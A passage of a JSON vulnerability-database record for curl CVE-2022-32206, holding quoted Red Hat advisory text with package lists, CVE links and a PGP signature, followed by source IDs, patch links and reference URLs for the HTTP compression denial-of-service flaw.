RHEL 7 Server:\n\nSource:\njbcs-httpd24-apr-util-1.6.1-99.el7jbcs.src.rpm\njbcs-httpd24-curl-7.86.0-2.el7jbcs.src.rpm\njbcs-httpd24-httpd-2.4.51-37.el7jbcs.src.rpm\njbcs-httpd24-mod_http2-1.15.19-20.el7jbcs.src.rpm\njbcs-httpd24-mod_jk-1.2.48-44.redhat_1.el7jbcs.src.rpm\njbcs-httpd24-mod_md-2.4.0-18.el7jbcs.src.rpm\njbcs-httpd24-mod_proxy_cluster-1.3.17-13.el7jbcs.src.rpm\njbcs-httpd24-mod_security-2.9.3-22.el7jbcs.src.rpm\njbcs-httpd24-nghttp2-1.43.0-11.el7jbcs.src.rpm\njbcs-httpd24-openssl-1.1.1k-13.el7jbcs.src.rpm\njbcs-httpd24-openssl-chil-1.0.0-17.el7jbcs.src.rpm\njbcs-httpd24-openssl-pkcs11-0.4.10-32.el7jbcs.src.rpm\n\nnoarch:\njbcs-httpd24-httpd-manual-2.4.51-37.el7jbcs.noarch.rpm\n\nx86_64:\njbcs-httpd24-apr-util-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-apr-util-debuginfo-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-apr-util-devel-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-apr-util-ldap-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-apr-util-mysql-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-apr-util-nss-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-apr-util-odbc-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-apr-util-openssl-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-apr-util-pgsql-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-apr-util-sqlite-1.6.1-99.el7jbcs.x86_64.rpm\njbcs-httpd24-curl-7.86.0-2.el7jbcs.x86_64.rpm\njbcs-httpd24-curl-debuginfo-7.86.0-2.el7jbcs.x86_64.rpm\njbcs-httpd24-httpd-2.4.51-37.el7jbcs.x86_64.rpm\njbcs-httpd24-httpd-debuginfo-2.4.51-37.el7jbcs.x86_64.rpm\njbcs-httpd24-httpd-devel-2.4.51-37.el7jbcs.x86_64.rpm\njbcs-httpd24-httpd-selinux-2.4.51-37.el7jbcs.x86_64.rpm\njbcs-httpd24-httpd-tools-2.4.51-37.el7jbcs.x86_64.rpm\njbcs-httpd24-libcurl-7.86.0-2.el7jbcs.x86_64.rpm\njbcs-httpd24-libcurl-devel-7.86.0-2.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_http2-1.15.19-20.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_http2-debuginfo-1.15.19-20.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_jk-ap24-1.2.48-44.redhat_1.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_jk-debuginfo-1.2.48-44.redhat_1.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_ldap-2.4.51-37.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_md-2.4.0-18.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_md-debuginfo-2.4.0-18.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_proxy_cluster-1.3.17-13.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_proxy_cluster-debuginfo-1.3.17-13.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_proxy_html-2.4.51-37.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_security-2.9.3-22.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_security-debuginfo-2.9.3-22.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_session-2.4.51-37.el7jbcs.x86_64.rpm\njbcs-httpd24-mod_ssl-2.4.51-37.el7jbcs.x86_64.rpm\njbcs-httpd24-nghttp2-1.43.0-11.el7jbcs.x86_64.rpm\njbcs-httpd24-nghttp2-debuginfo-1.43.0-11.el7jbcs.x86_64.rpm\njbcs-httpd24-nghttp2-devel-1.43.0-11.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-1.1.1k-13.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-chil-1.0.0-17.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-chil-debuginfo-1.0.0-17.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-debuginfo-1.1.1k-13.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-devel-1.1.1k-13.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-libs-1.1.1k-13.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-perl-1.1.1k-13.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-pkcs11-0.4.10-32.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-pkcs11-debuginfo-0.4.10-32.el7jbcs.x86_64.rpm\njbcs-httpd24-openssl-static-1.1.1k-13.el7jbcs.x86_64.rpm\n\nRed Hat JBoss Core Services on RHEL 8:\n\nSource:\njbcs-httpd24-apr-util-1.6.1-99.el8jbcs.src.rpm\njbcs-httpd24-curl-7.86.0-2.el8jbcs.src.rpm\njbcs-httpd24-httpd-2.4.51-37.el8jbcs.src.rpm\njbcs-httpd24-mod_http2-1.15.19-20.el8jbcs.src.rpm\njbcs-httpd24-mod_jk-1.2.48-44.redhat_1.el8jbcs.src.rpm\njbcs-httpd24-mod_md-2.4.0-18.el8jbcs.src.rpm\njbcs-httpd24-mod_proxy_cluster-1.3.17-13.el8jbcs.src.rpm\njbcs-httpd24-mod_security-2.9.3-22.el8jbcs.src.rpm\njbcs-httpd24-nghttp2-1.43.0-11.el8jbcs.src.rpm\njbcs-httpd24-openssl-1.1.1k-13.el8jbcs.src.rpm\njbcs-httpd24-openssl-chil-1.0.0-17.el8jbcs.src.rpm\njbcs-httpd24-openssl-pkcs11-0.4.10-32.el8jbcs.src.rpm\n\nnoarch:\njbcs-httpd24-httpd-manual-2.4.51-37.el8jbcs.noarch.rpm\n\nx86_64:\njbcs-httpd24-apr-util-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-devel-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-ldap-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-ldap-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-mysql-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-mysql-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-nss-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-nss-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-odbc-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-odbc-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-openssl-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-openssl-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-pgsql-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-pgsql-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-sqlite-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-apr-util-sqlite-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm\njbcs-httpd24-curl-7.86.0-2.el8jbcs.x86_64.rpm\njbcs-httpd24-curl-debuginfo-7.86.0-2.el8jbcs.x86_64.rpm\njbcs-httpd24-httpd-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-httpd-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-httpd-devel-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-httpd-selinux-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-httpd-tools-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-httpd-tools-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-libcurl-7.86.0-2.el8jbcs.x86_64.rpm\njbcs-httpd24-libcurl-debuginfo-7.86.0-2.el8jbcs.x86_64.rpm\njbcs-httpd24-libcurl-devel-7.86.0-2.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_http2-1.15.19-20.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_http2-debuginfo-1.15.19-20.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_jk-ap24-1.2.48-44.redhat_1.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_jk-ap24-debuginfo-1.2.48-44.redhat_1.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_ldap-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_ldap-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_md-2.4.0-18.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_md-debuginfo-2.4.0-18.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_proxy_cluster-1.3.17-13.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_proxy_cluster-debuginfo-1.3.17-13.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_proxy_html-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_proxy_html-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_security-2.9.3-22.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_security-debuginfo-2.9.3-22.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_session-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_session-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_ssl-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-mod_ssl-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm\njbcs-httpd24-nghttp2-1.43.0-11.el8jbcs.x86_64.rpm\njbcs-httpd24-nghttp2-debuginfo-1.43.0-11.el8jbcs.x86_64.rpm\njbcs-httpd24-nghttp2-devel-1.43.0-11.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-1.1.1k-13.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-chil-1.0.0-17.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-chil-debuginfo-1.0.0-17.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-debuginfo-1.1.1k-13.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-devel-1.1.1k-13.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-libs-1.1.1k-13.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-libs-debuginfo-1.1.1k-13.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-perl-1.1.1k-13.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-pkcs11-0.4.10-32.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-pkcs11-debuginfo-0.4.10-32.el8jbcs.x86_64.rpm\njbcs-httpd24-openssl-static-1.1.1k-13.el8jbcs.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2022-1292\nhttps://access.redhat.com/security/cve/CVE-2022-2068\nhttps://access.redhat.com/security/cve/CVE-2022-22721\nhttps://access.redhat.com/security/cve/CVE-2022-23943\nhttps://access.redhat.com/security/cve/CVE-2022-26377\nhttps://access.redhat.com/security/cve/CVE-2022-28330\nhttps://access.redhat.com/security/cve/CVE-2022-28614\nhttps://access.redhat.com/security/cve/CVE-2022-28615\nhttps://access.redhat.com/security/cve/CVE-2022-30522\nhttps://access.redhat.com/security/cve/CVE-2022-31813\nhttps://access.redhat.com/security/cve/CVE-2022-32206\nhttps://access.redhat.com/security/cve/CVE-2022-32207\nhttps://access.redhat.com/security/cve/CVE-2022-32208\nhttps://access.redhat.com/security/cve/CVE-2022-32221\nhttps://access.redhat.com/security/cve/CVE-2022-35252\nhttps://access.redhat.com/security/cve/CVE-2022-42915\nhttps://access.redhat.com/security/cve/CVE-2022-42916\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBY5ISE9zjgjWX9erEAQixuA//dX5Q3wtu2MRvrjD/sK/r6dqBz4fWWhS9\nws2A8cRa5ki3RlCaYQ3pP7LkRtIdankAP3HG1NU4er/odsMEW5aEgku+5foV7w4M\nWEd0USLKs3Pw5a7/3TjOBUf5CA7oet03C7/u9idWaLD/ip4UMhskSnz33qFQSFZf\nFAWNdsRhH8+ql6qFMg9Odv5RFX3i2+wBy5pC69Akr2FBEt9j+/PbvSPWuPD26n6H\n0l+QUKrI3OW1EHzz+S/8aEfTFKLluXfhVJn61wdA8Kjs4ZKrnBz8czJjxn4hOi7a\nz0tpzg5d1BJEf/UB7EdyyLBGRIliWhf978qtG8QS37GEgnQSof2xgcfu1NGiHl9j\nypCqX1R4oOkeoISynnZUKWZ1uFp5GkMiRtPu0Bw7WYB6z/8OWZce4yIqh1rcG09d\nNcyleabDtpJ7C3BJQzpnhXAWjri7oJ6wHBvcbQ9sLj2xkQRX2Zpi0KJGIH8iLwdn\nIk+RIZ7u/mXeW3ulcwiQTPYbTQLWGXqgZV1qxJq91HIcu+y3STQwZjb4fZuqjH5M\nonO/rF2y50l9LqArg/v9KAJUbHSKMDP6r7Dx02J+iKjW3g7NczoImrU7JcyAgce9\nmCN7gMmU9bQx1tagIKcKKW5IVN/jHyWKJW/t0teoaECsa2LMgoEIt+6RcmQXWpdF\n6t6oQh+b3NY=UGfz\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Description:\n\nThe curl packages provide the libcurl library and the curl utility for\ndownloading files from servers using various protocols, including HTTP,\nFTP, and LDAP. Bugs fixed (https://bugzilla.redhat.com/):\n\n2099300 - CVE-2022-32206 curl: HTTP compression denial of service\n2167815 - CVE-2023-23916 curl: HTTP multi-header compression denial of service\n\n6",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-32206"
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-32206"
      },
      {
        "db": "PACKETSTORM",
        "id": "168538"
      },
      {
        "db": "PACKETSTORM",
        "id": "168275"
      },
      {
        "db": "PACKETSTORM",
        "id": "170741"
      },
      {
        "db": "PACKETSTORM",
        "id": "168347"
      },
      {
        "db": "PACKETSTORM",
        "id": "170083"
      },
      {
        "db": "PACKETSTORM",
        "id": "170166"
      },
      {
        "db": "PACKETSTORM",
        "id": "172765"
      },
      {
        "db": "PACKETSTORM",
        "id": "168284"
      }
    ],
    "trust": 1.71
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2022-32206",
        "trust": 2.5
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2023/02/15/3",
        "trust": 1.6
      },
      {
        "db": "HACKERONE",
        "id": "1570651",
        "trust": 1.6
      },
      {
        "db": "SIEMENS",
        "id": "SSA-333517",
        "trust": 1.6
      },
      {
        "db": "PACKETSTORM",
        "id": "168347",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "170166",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "168284",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.3366",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.6333",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2023.3732",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.6290",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.4468",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.4757",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2023.3143",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2023.3238",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.4324",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.5247",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.4266",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.4112",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.3117",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.5632",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2023.2163",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.5300",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.4525",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.4568",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "167607",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "168301",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "168174",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "168503",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "168378",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "169443",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022071152",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022062927",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202206-2565",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-32206",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "168538",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "168275",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "170741",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "170083",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "172765",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2022-32206"
      },
      {
        "db": "PACKETSTORM",
        "id": "168538"
      },
      {
        "db": "PACKETSTORM",
        "id": "168275"
      },
      {
        "db": "PACKETSTORM",
        "id": "170741"
      },
      {
        "db": "PACKETSTORM",
        "id": "168347"
      },
      {
        "db": "PACKETSTORM",
        "id": "170083"
      },
      {
        "db": "PACKETSTORM",
        "id": "170166"
      },
      {
        "db": "PACKETSTORM",
        "id": "172765"
      },
      {
        "db": "PACKETSTORM",
        "id": "168284"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202206-2565"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-32206"
      }
    ]
  },
  "id": "VAR-202206-1900",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.5566514
  },
  "last_update_date": "2026-04-10T23:28:19.708000Z",
  "patch": {
    "_id": null,
    "data": [
      {
        "title": "curl Remediation of resource management error vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=198520"
      },
      {
        "title": "Ubuntu Security Notice: USN-5495-1: curl vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-5495-1"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2022-32206"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202206-2565"
      }
    ]
  },
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-770",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-32206"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 1.6,
        "url": "https://hackerone.com/reports/1570651"
      },
      {
        "trust": 1.6,
        "url": "http://seclists.org/fulldisclosure/2022/oct/41"
      },
      {
        "trust": 1.6,
        "url": "http://www.openwall.com/lists/oss-security/2023/02/15/3"
      },
      {
        "trust": 1.6,
        "url": "https://www.debian.org/security/2022/dsa-5197"
      },
      {
        "trust": 1.6,
        "url": "https://security.netapp.com/advisory/ntap-20220915-0003/"
      },
      {
        "trust": 1.6,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf"
      },
      {
        "trust": 1.6,
        "url": "https://lists.debian.org/debian-lts-announce/2022/08/msg00017.html"
      },
      {
        "trust": 1.6,
        "url": "http://seclists.org/fulldisclosure/2022/oct/28"
      },
      {
        "trust": 1.6,
        "url": "https://support.apple.com/kb/ht213488"
      },
      {
        "trust": 1.6,
        "url": "https://security.gentoo.org/glsa/202212-01"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/bev6br4mti3cewk2yu2hqzuw5fas3fey/"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/cve/cve-2022-32206"
      },
      {
        "trust": 0.8,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.8,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/cve/cve-2022-32208"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1292"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2022-1292"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2022-2068"
      },
      {
        "trust": 0.6,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/bev6br4mti3cewk2yu2hqzuw5fas3fey/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2023.3143"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/curl-denial-of-service-via-http-compression-38671"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022062927"
      },
      {
        "trust": 0.6,
        "url": "https://support.apple.com/en-us/ht213488"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/168347/red-hat-security-advisory-2022-6422-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.6290"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/168301/red-hat-security-advisory-2022-6287-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/168174/red-hat-security-advisory-2022-6157-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.4112"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.5300"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/170166/red-hat-security-advisory-2022-8840-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/168378/red-hat-security-advisory-2022-6507-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.5247"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.6333"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.3366"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/168503/red-hat-security-advisory-2022-6560-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.4757"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/167607/ubuntu-security-notice-usn-5495-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2023.2163"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022071152"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2023.3732"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2023.3238"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/168284/red-hat-security-advisory-2022-6183-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.4266"
      },
      {
        "trust": 0.6,
        "url": "https://cxsecurity.com/cveshow/cve-2022-32206/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.5632"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.4468"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.4324"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.4525"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/169443/red-hat-security-advisory-2022-7058-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.3117"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.4568"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2022-2097"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2022-1586"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1586"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2022-29154"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32206"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-2068"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2022-1785"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2022-1897"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2022-1927"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2022-2526"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32208"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0391"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-20107"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1897"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2015-20107"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2022-30629"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-2097"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1785"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2022-0391"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2022-34903"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2022-32148"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2022-1705"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-2526"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2022-30631"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-29154"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#critical"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1927"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-36067"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-31129"
      },
      {
        "trust": 0.2,
        "url": "https://issues.jboss.org/):"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32148"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1705"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-30631"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-30698"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1304"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-26716"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-27406"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-30293"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35525"
      },
      {
        "trust": 0.2,
